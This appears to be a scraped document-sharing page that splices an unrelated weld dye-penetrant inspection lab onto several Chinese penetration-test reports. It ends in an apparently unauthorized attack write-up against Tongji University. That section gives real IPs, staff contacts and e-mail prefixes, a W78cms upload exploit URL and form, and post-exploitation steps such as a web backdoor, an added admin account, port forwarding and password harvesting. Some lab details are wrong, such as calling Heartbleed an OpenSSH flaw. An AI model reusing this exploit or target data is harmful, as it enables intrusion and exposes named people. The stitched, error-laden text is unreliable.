同济大学渗透测试报告讲解
- 格式:doc
- 大小:915.01 KB
- 文档页数:28
实验八着色渗透探伤一、实验目的1.通过实验了解着色渗透探伤的基本原理;2.掌握着色渗透探伤的操作方法,以及缺陷的检查评定。
二、实验原理着色渗透探伤是采用带有红色染料的渗透剂的渗透作用,显示缺陷痕迹的无损探伤法。
渗透探伤是检验表面开口缺陷的常规方法。
渗透探伤的基本原理是在被检工件表面涂上某种具有高渗透能力的渗透液,利用液体对固体表面细小孔隙的渗透作用,使渗透液渗透到工件表面的开口缺陷中,然后用水或其它清洗液将工件表面多余的渗透液清洗干净,待工件干燥后再把显像剂涂在工件表面,利用毛细管作用将缺陷中的渗透液重新吸附出来,在工件表面形成缺陷的痕迹,根据显示的缺陷痕迹对缺陷进行分析、判断。
其基本原理及基本步骤见图1。
a) b) c)d) e)图1 渗透探伤的基本原理及步骤a) 前清洁处理b)渗透处理c)清洗去除处理d)显像处理e)检查评定焊接件的探伤:(1)表面预处理焊缝及热影响区表面容易粘有焊渣、焊剂、飞溅物、氧化物等污物,在进行着色检测前要进行清理,常用的清理方法是机械清理法。
污物清理干净后,再用清洗液清洗焊缝表面的油污,最后用压缩空气吹干。
(2)渗透由于焊接工件的尺寸一般较大,所以施加渗透液时,常采用喷涂或刷涂,一般应在焊缝上反复施加3~4次,每次间隔3~5min,小型工件可采用浸涂法(3)去除先用干燥、洁净不脱毛的布或纸按一个方向进行依次擦拭,直至大部分多余渗透剂被去除后,再用蘸有清洗剂的干净不脱毛布或纸进行擦拭,将被检面上多余的渗透剂全部擦净。
(4)干燥清洗干净的焊缝及热影响区表面可经自然风干或用压缩空气吹干。
(5)显像和观察利用压缩空气或压力喷罐将溶剂悬浮显像粉均匀地喷洒在焊缝及热影响区表面,显像3~5分钟后,可用肉眼或借助3~5放大镜观察所显示的图像,为发现细微缺陷,可间隔5分钟观察一次,重复观察2~3次。
(6)后清洗用湿布擦除被检面显像剂或用水冲洗。
避免残留在焊缝上的渗透液和显像剂会影响随后进行的焊接,使其产生缺陷。
随着网络安全形势的日益严峻,渗透测试作为一种重要的安全评估手段,越来越受到企业和组织的重视。
为了提升自身的网络安全防护能力,我于2023年夏季参加了某知名网络安全公司的渗透测试实习项目。
二、实习内容1. 基础知识学习实习初期,我主要学习了网络安全基础知识,包括网络协议、操作系统、数据库、Web安全等。
通过学习,我对网络安全领域有了更全面的认识,为后续的渗透测试工作打下了坚实的基础。
2. 工具使用与实战演练在掌握基础知识后,我开始学习并熟练使用渗透测试工具,如Nmap、Metasploit、Burp Suite等。
同时,我还参加了公司组织的实战演练,通过模拟真实场景,提升了自己的实战能力。
3. 渗透测试项目实施在实习期间,我参与了多个渗透测试项目,包括Web应用渗透测试、移动应用渗透测试、物联网设备渗透测试等。
具体工作内容包括:(1)信息收集:通过搜索引擎、DNS解析、子域名枚举等手段,收集目标系统的基本信息。
(2)漏洞扫描:利用Nmap、Burp Suite等工具,对目标系统进行漏洞扫描,发现潜在的安全风险。
(3)漏洞利用:针对发现的漏洞,尝试利用相应的工具或编写脚本进行漏洞利用,获取目标系统权限。
(4)权限提升:在获得一定权限后,尝试提升权限,获取更高的系统访问权限。
(5)内网渗透:通过横向移动、密码破解、漏洞利用等手段,实现对目标内网的渗透。
(6)安全报告撰写:对渗透测试过程进行总结,撰写详细的安全报告,提出整改建议。
1. 技能提升:通过实习,我熟练掌握了渗透测试相关工具的使用,提升了实战能力。
2. 思维拓展:在渗透测试过程中,我学会了如何从不同的角度思考问题,拓展了自己的思维方式。
3. 团队协作:在项目实施过程中,我与团队成员紧密合作,共同完成了多个渗透测试项目。
4. 职业规划:通过实习,我对网络安全行业有了更深入的了解,为自己的职业规划提供了明确的方向。
四、总结本次渗透测试实习让我受益匪浅,不仅提升了我的专业技能,还让我认识到网络安全的重要性。
渗透检测实验报告渗透检测实验报告一、引言渗透检测是指对系统或网络进行安全性评估的过程,通过模拟黑客攻击的方式,评估系统的安全性,并提供相应的改进建议。
本实验旨在通过渗透检测,发现系统中存在的潜在漏洞,从而提升系统的安全性。
二、实验背景在当今数字化时代,信息安全成为了一个重要的话题。
随着互联网的普及和技术的发展,网络攻击的威胁日益增加,因此,对系统进行渗透检测显得尤为重要。
本次实验选择了一家电商网站作为目标,通过模拟攻击手段,评估其安全性。
三、实验过程1.信息收集在渗透检测之前,首先需要进行信息收集。
通过搜索引擎和网络工具,获取目标网站的基本信息,如IP地址、域名注册信息等。
此外,还可以通过社交媒体等渠道,获取目标网站相关的员工信息,以便后续攻击。
2.漏洞扫描漏洞扫描是渗透检测的重要步骤。
通过使用专业的漏洞扫描工具,对目标网站进行扫描,发现其中可能存在的漏洞。
常见的漏洞包括SQL注入、跨站脚本攻击等。
扫描结果将提供给系统管理员,以便他们修复这些漏洞。
3.密码破解密码破解是渗透检测中的一项重要任务。
通过使用强力破解工具,对目标网站的用户密码进行破解,以验证密码强度和用户密码管理的安全性。
如果密码过于简单或者存在明文存储的情况,系统管理员应该及时采取相应措施加强密码安全性。
4.漏洞利用在发现漏洞之后,攻击者可以利用这些漏洞进行进一步的攻击。
在本次实验中,我们选择了一个已知的漏洞进行利用,以验证目标网站的安全性。
通过利用漏洞,我们成功获取了目标网站的管理员权限,并能够对其进行任意操作。
5.报告撰写渗透检测的最后一步是撰写报告。
报告应该详细记录实验的过程、发现的漏洞以及相应的修复建议。
报告应该以清晰简洁的语言呈现,以便系统管理员能够理解并采取相应的措施。
四、实验结果通过本次渗透检测实验,我们发现了目标网站存在的多个漏洞。
其中包括SQL注入漏洞、XSS漏洞以及弱密码等。
这些漏洞可能导致用户信息泄露、系统崩溃等安全问题。
渗透测试测试报告第一篇:渗透测试测试报告概述本次渗透测试测试报告主要针对某公司网络进行测试分析,旨在发现公司网络系统中可能存在的安全隐患和漏洞,提醒企业防范网络攻击风险,加强网络安全保护。
测试过程主要包括对公司内部外网、网站、服务器等多个方面进行渗透测试,通过模拟攻击测试手段,找出存在的安全风险和漏洞,同时为企业提供有效的安全建议及未来风险预警。
测试结果显示,在企业管理安全警示、弱密码策略及各类漏洞等方面存在一定的问题,需加以改进优化。
本次测试报告将详细阐述各项测试结果及建议,提供给企业作为改进建议的重要依据。
企业应针对测试反馈的问题进行审慎分析,采取措施加强网络安全监测、应急响应等方面的建设,全面加强企业网络安全保障能力,提高安全防御破解能力,保障公司正常业务运营。
第二篇:测试内容及结果本次渗透测试涉及的测试内容主要包括以下方面:1. 网络规划:检查控制域名、子域名导致的域名劫持、信息泄漏、身份欺骗、DNS污染、电信诈骗等安全漏洞;2. 网络设备:检查路由器、交换机、防火墙等网络设备存在的各类漏洞,如弱口令、远程溢出等;3. 数据库:检查数据库安全漏洞,如注入漏洞、数据泄露等;4. 服务器:检查服务器存在的各类安全风险,如弱登录口令、文件上传漏洞、目录遍历漏洞、重要服务权限等;5. 网站:检查网站的xss注入、sql注入、文件上传、命令执行等漏洞。
本次测试共发现多项安全漏洞,主要包括:1. 网络设备存在弱口令漏洞,并且存在多个设备使用同一密码,导致攻击者可成功登录并执行恶意操作;2. 数据库存在较为普遍的注入漏洞,导致攻击者可随意获取敏感信息;3. 服务器存在文件上传漏洞和目录遍历漏洞,攻击者可完成文件上传、获取文件权限等恶意操作。
4. 网站存在xss注入、sql注入、文件上传等安全问题,攻击者可通过漏洞进行数据篡改、信息泄漏等操作。
综上所述,本次测试发现企业安全防护措施不及时完善,漏洞较多,需要企业相关工作人员对问题进行及时解决,防止安全事件发生。
渗透检测总结报告范文一、引言渗透检测是信息安全领域非常重要的一项工作,通过模拟黑客攻击的方式评估系统的安全性和漏洞情况。
本报告总结了最近进行的一次渗透检测活动的过程、方法和结果,旨在帮助企业进一步提高其信息安全和网络防御能力。
二、活动概述本次渗透检测活动旨在评估公司内部网络系统的漏洞和安全性。
活动团队由公司内部的信息安全专家和外部安全顾问组成,采用了黑盒测试的方法进行渗透检测。
活动期间,团队通过模拟外部攻击者的方式,对公司内部网络进行了全面扫描、漏洞评估和权限提升的测试,并最终提供了一份详细的渗透检测报告。
三、检测方法1.信息搜集:通过搜索引擎、社交媒体和公开数据等方式,搜集了公司相关的信息,包括域名、IP地址、员工姓名等。
2.端口扫描:使用端口扫描工具对公司网络进行了扫描,识别出了开放的端口和服务。
3.漏洞评估:针对开放的端口和服务,使用漏洞扫描工具进行了漏洞评估,识别出了存在的漏洞。
4.密码破解:通过弱密码字典和暴力破解工具,对系统的登录密码进行了破解尝试,评估了密码的强度和保护措施。
5.权限提升:通过渗透测试工具模拟攻击者的方式,对系统进行了权限提升的测试,评估了系统的安全性和访问控制机制。
四、检测结果1.信息泄露:在信息搜集阶段,团队发现公司的一些信息通过搜索引擎和社交媒体等途径可能被攻击者获得,建议公司提高对敏感信息的保护意识,并完善信息保护机制。
2.端口暴露:团队发现公司的某些端口和服务对外开放,并存在一定的风险,建议加强对开放端口的监控和访问控制,及时修补漏洞。
3.弱密码问题:通过密码破解工具,团队成功破解了部分员工的密码,建议公司加强对员工密码的管理和培训,提高密码的复杂度。
4.权限提升:团队成功获取了某些员工的管理员权限,建议公司完善访问控制机制,限制员工的权限,并且加强对员工账号的监控和审计。
五、改进建议1.加强信息保护意识:加强对敏感信息的保护和管理,定期对员工进行信息安全培训,提高员工的信息保护意识。
简单网页攻击首先看看bitpt 的报文段:报文段以明文形式传输,可以很容易拦截。
假设输入错误的密码:显示前面的密码。
校园网本身就有防火墙和其他网络隔离,使得从外网进入校园网内部攻击相当困难,还有就是本身这些攻击网址的利益时微乎其微的。
但是一般的网络应用的验证机制会比校园bitpt 平安的多,但是并不意味它们比bitpt 平安。
网站简介主页简介主页的页面内容是将通过javascript脚本来实现加载的。
每次需要受到修改javascript内容才能实现。
网站后台bbs论坛IP登陆网站值得研究的是可以获取每一个用户登陆的IP,并且记录下来。
虽然这样做多少有利于网站在ip限制登陆的时候有作用,但是,往往这样做会使得用户账号在被恶意用户攻破之后对用户的身份产生更大的影响。
网站的目录结构该站点对用户没有设置新的目录来存取用户信息,这样可以防止对用户文件的访问,但是其采用的是在网站根目录下面通过网页文件的名字来区别用户,这样对于网络攻击者来说,他不需要去猜测用户的用户名,只需要通过修改地址栏里面的地址,就可以查看其他人的用户名和id,甚至可以很轻松的查到网站的管理员。
网站小bug主页的注册按钮点击之后效果:Bbs主页的注册按钮点击之后的效果为:两次的效果只是差了一个地址值:主页:Bbs页面:平安提示-木马病毒平安联盟的提醒好的,我们对于测试网站的一些简单介绍到此为止,接下来我们将主要介绍在这个网站中发现的一些不平安因素。
找回密码验证OpenID功能的使用登录验证在拦截到登陆的时候采用的消息头数据,在请求中输入注册使用的用户名和密码,如下列图。
我们试着提交请求,发现果然能够登陆。
由此我们也有足够的理由来说明这个网站在登陆的时候并没有使用平安的SSL验证机制,处于平安考虑,我们不建议用户直接在首页实行登陆。
我们接着查看源代码,发现在提交的时候标明使用lsssubmit=yes的参数,但是在具体登陆的时候,并没有给出具体的实现,通过代理效劳器修改参数也实现了登陆,这就进一步认证了登陆的不平安性。
一、实验背景随着网络技术的飞速发展,网络安全问题日益突出。
为了提高网络安全防护能力,了解并掌握渗透技术对于网络安全人员至关重要。
本实验旨在通过搭建渗透测试平台,熟悉常用渗透测试工具,对目标系统进行渗透测试,分析渗透过程中的关键技术,为实际网络安全防护提供参考。
二、实验目的1. 熟悉渗透测试的基本流程和常用工具;2. 掌握端口扫描、漏洞扫描、密码破解、权限提升等渗透测试关键技术;3. 分析渗透过程中遇到的问题及解决方案,提高网络安全防护能力。
三、实验环境1. 操作系统:Kali Linux 2;2. 网络环境:交换网络结构;3. 实验工具:Metasploitable2(虚拟机镜像)、Nmap、Wireshark、Burp Suite、Metasploit等。
四、实验步骤1. 搭建渗透测试平台首先,在Kali Linux 2上搭建Metasploitable2虚拟机,作为渗透测试的目标系统。
然后,在虚拟机中安装所需渗透测试工具,如Nmap、Wireshark、Burp Suite、Metasploit等。
2. 端口扫描使用Nmap对目标系统进行端口扫描,以发现开放的端口和暴露的服务。
例如,以下命令用于扫描目标系统的80、22、3389等端口:```nmap -p 80,22,3389 192.168.1.10```扫描结果如下:```Nmap scan report for 192.168.1.10Host is up (0.0042s latency).Not shown: 9996 filtered portsPORT STATE SERVICE80 open http22 open ssh3389 open ms-rdp```3. 漏洞扫描使用Nessus或OpenVAS等漏洞扫描工具对目标系统进行漏洞扫描,以发现潜在的安全漏洞。
例如,以下命令用于扫描目标系统:```nessus -h 192.168.1.10 -p 80,22,3389```漏洞扫描结果如下:```Port 80: HTTP - 'PHP Code Injection' (ID: 91336)Port 22: SSH - 'OpenSSH Heartbleed (CVE-2014-0160)' (ID: 68203)Port 3389: RDP - 'Windows Remote Desktop Services (RDP) - Information Disclosure' (ID: 92121)```4. 密码破解针对发现的漏洞,使用工具如John the Ripper、Hydra等尝试破解目标系统的密码。
渗透检测报告范文一、概要本次渗透检测是为了评估目标系统的安全性和防护能力,通过模拟攻击手段发现系统中的安全漏洞并提出相应的修复建议。
本次渗透检测针对目标系统的网络设备、主机、应用程序等进行了全面检测。
二、渗透检测目标及范围本次渗透检测的目标为公司内部的网络系统,包括网络设备、服务器、数据库等。
具体范围如下:1.网络设备检测:对路由器、交换机等网络设备进行漏洞扫描和弱口令破解。
2.主机检测:对公司内部的服务器进行操作系统漏洞扫描、服务端口扫描和用户权限提升等测试。
3. 应用程序检测:对公司内部的Web应用程序进行安全测试,包括注入漏洞、文件上传漏洞、跨站脚本攻击等。
4.安全策略检测:对公司内部的防火墙、入侵检测系统(IDS)等进行配置评估,检测是否存在配置错误和漏洞。
三、渗透检测结果1.网络设备检测结果:通过漏洞扫描发现了路由器1台存在漏洞,该漏洞可能被黑客利用进行非授权访问和获取敏感信息。
建议及时更新固件并加强管理。
弱口令破解测试中发现了2个设备的默认口令未被修改,存在被攻击的风险,建议及时修改默认口令并采用强密码策略。
2.主机检测结果:对所有服务器进行了操作系统漏洞扫描,发现4台服务器存在未打补丁的漏洞,可能被黑客入侵。
建议及时升级补丁。
服务端口扫描中,发现1台服务器开放了不必要的服务,增加了攻击面,建议关闭不必要的服务。
用户权限提升测试中,发现1台服务器存在弱密码账户,建议修改密码并采用复杂度要求较高的密码。
3.应用程序检测结果:Web应用程序测试中发现了一个存在SQL注入漏洞的页面,黑客可以通过此漏洞获取数据库中的敏感信息。
建议对该页面进行代码修复和输入过滤。
4.安全策略检测结果:在防火墙配置评估中,发现存在一些不必要开放的端口和规则,建议及时关闭并删除不必要的开放端口和规则。
IDS配置评估中,发现IDS未更新规则库,无法检测最新的攻击行为,建议定期更新规则库。
四、修复建议根据以上渗透检测结果,我们提出以下修复建议:1.更新路由器固件并加强管理,确保设备安全。
同济大学渗透测试报告评估人:Zvall--------------------------------------------------------------------------------------------------------------------目标:同济大学域名:1.信息收集收集 网站子站信息为后续渗透做好铺垫1.1 获取IP:使用Ping得到IP 202.120.189.3 address:上海Ping 返回Request timed out 不排除有防火墙W AF等包过滤的可能1.2 Whois 查询得到:网段: 202.120.176.0 - 202.120.191.255管理员联系:Cui , Zijun (ZC3-CN)+86-21-6598-9006技术人员联系:Wang , Zhengping (ZW2-CN)+86 21 65025080 ext. 2840最后更新记录在19970627记录于19970627 202.120.191.30 202.120.191.208Mail:收集222.66.109.6Mail服务器: 采用是的:网易Coremail Java 写的用xml的格式进行数据传递利用xml解析漏洞可能读取任意文件邮箱收集:碰过很多用邮箱前辍做密码的.qiche@antli8899@yangdyk@xjzeng@tousu@rsc@dxwg@100759@xinxihua@3d@wulirui@xxgk@helpdesk@liushuyan@gbt@092783@子域:分布这个网段:202.120.189.3-202.120.189.255C段全部是WEB应用同服网站:2.IP 扫描nmap -sS -sV -P0 -T4 -O -A -F -sC --version-light -v 80/tcp open http nginx 1.0.8|_http-methods: No Allow or Public header in OPTIONS response (status code 405)|_http-title: \xE6\xAC\xA2\xE8\xBF\x8E\xE8\xAE\xBF\xE9\x97\xAE\xE5\x90\x8C\xE6\xB5\x8E\xE5\xA4\xA7\xE5\xAD\xA6\xE4\xB8\xBB\xE9\xA1\xB5nix 只对外开放一个80 估计是Iptables策略信息收集的差不多这后由于主站只开放一个WEB应用只好转战WEB上来:1.3 Web服务评估:1. 查找指纹提交一个HEAD 返回:Request sent. 238 bytes< HTTP/1.1 200 OK< Server: nginx/1.0.8< Date: Fri, 10 Aug 2012 09:53:41 GMT< Content-Type: text/html< Connection: keep-alive< Vary: Accept-Encoding<200 Request complete用的nginx 存在一个解析漏洞/images/logo_03.jpg/1.php jpg文件会当php代码执行测试不存在本以为主站服务器是Linux当提交site: inurl:asp|php|jsp||aspx发现居然是asp 看来服务器是Windows了2.Web应用评估首先使用Wet工具对镜点进行镜像WGET -r -a ‘*.html,*htm’ 只包含html文件因为方便查找HIDDEN字段用findstr 找并没有找到HIDDEN字段在SC目录下找到一个asp的网站测试了也没存在漏洞还调用了防注入程序过滤GET POST COOKIE 提交过来的数据主站无果旁站也没有可拿到shell的漏洞现在只好渗透分站了Ip::202.120.189.3 此站服务器上只有一个站点初步估计权限会很大好提权好吧就它了先测试注入提交单引号:/clwww/shownews.asp?id=65’居然玩跳转:爆露了所用WEB程序为:W78cms如果直接跳转不用Response.End 结束程序的话我们仍可以注入W78CMS存在一个上传漏洞:分析下源码:Sub InitUpload()sType = UCase(Trim(Request.QueryString("type")))sStyleName = Trim(Request.QueryString("style"))sCusDir = Trim(Request.QueryString("cusdir"))sParamSYFlag = Trim(Request.QueryString("syflag"))sCusDir = Replace(sCusDir, "\", "/")If Left(sCusDir, 1) = "/" Or Left(sCusDir, 1) = "." Or Right(sCusDir, 1) = "." Or InStr(sCusDir, "./") > 0 Or InStr(sCusDir, "/.") > 0 Or InStr(sCusDir, "//") > 0 ThensCusDir = ""'这里程序员只考虑到了跨目录的问题End IfDim i, aStyleConfig, bValidStylebValidStyle = FalseFor i = 1 To Ubound(aStyle)aStyleConfig = Split(aStyle(i), "|||")If Lcase(sStyleName) = Lcase(aStyleConfig(0)) ThenbValidStyle = TrueExit ForEnd IfNextIf bValidStyle = False ThenOutScript("parent.UploadError('style')")End IfsBaseUrl = aStyleConfig(19)nUploadObject = Clng(aStyleConfig(20))nAutoDir = CLng(aStyleConfig(21))sUploadDir = aStyleConfig(3)If sBaseUrl<>"3" ThenIf Left(sUploadDir, 1) <> "/" ThensUploadDir = "../" & sUploadDirEnd IfEnd IfSelect Case sBaseUrlCase "0", "3"sContentPath = aStyleConfig(23)Case "1"sContentPath = RelativePath2RootPath(sUploadDir)Case "2"sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir)) End SelectIf sBaseUrl<>"3" ThensUploadDir = Server.Mappath(sUploadDir) ‘这里创建目录End IfIf Right(sUploadDir,1)<>"\" ThensUploadDir = sUploadDir & "\"End If很明显程序员只考虑到跨目录的漏洞没有过滤点号最后创目录结合IIS解析漏洞导致漏洞形成漏洞修复方法:sCusDir = Replace(sCusDir, ".", "")漏洞利用:/clwww/admin/w78eWebEditor/asp/upload.asp?action=save&type=image &style=popup&cusdir=Zvall.asp这时程序会在uploadfile 目下创建一个名为Zvall.asp的文件夹<formaction="/clwww/admin/w78eWebEditor/asp/upload.asp?action=save&type =image&style=popup&cusdir=Zvall.asp" method=post name=myformenctype="multipart/form-data"><input type=file name=uploadfile size=100><br><br><input type=submit value=upload></form>上传WEB后门发现服务器已被攻陷有administrator组admin$帐号一枚并且发现服务器支持JSP 默认是SYSTEM权限ipconfig /all后发现服务器有4张网卡其中一张是VirtualBox虚拟网卡搞这么多张网卡?我在想为什么网络管理员不搞个交换机堆叠级联服务器在做单网卡多IP的方式这样就可以实现单网卡多IP了一下省几张网卡初步确定是做了VLAN 而且可以相互通信其实多IP的话一张网即可搞定多网段意味着渗透的空间更大执行net user Administrator命令后发现:管理员的最后登录时间为2012-8-14 7:00看来服务器管理员经常来服务器在查看了下administrator的桌面发现个bat内容为:ipconfig /releaseipconfig /renew可以看出服务器的某张网卡采取的是dhcp方式初步猜测管理员可能不是小白所以类似进服务器桌面操作看起来有点不可取但又没办法只好挂上一个VPN加一个跳板再添加管理帐号再用lcx.exe 转发端口网络连接信息:执行ipconfig /all:后发现有如下网段网段1: 10.10.203.*网段2: 192.168.0.*网段3: 169.254.* DHCP首先渗透网段2:先破系统hash为:gisgp** 由于服务器上装了chrome浏览器所以读读密码吧例如上网上时表单的密码。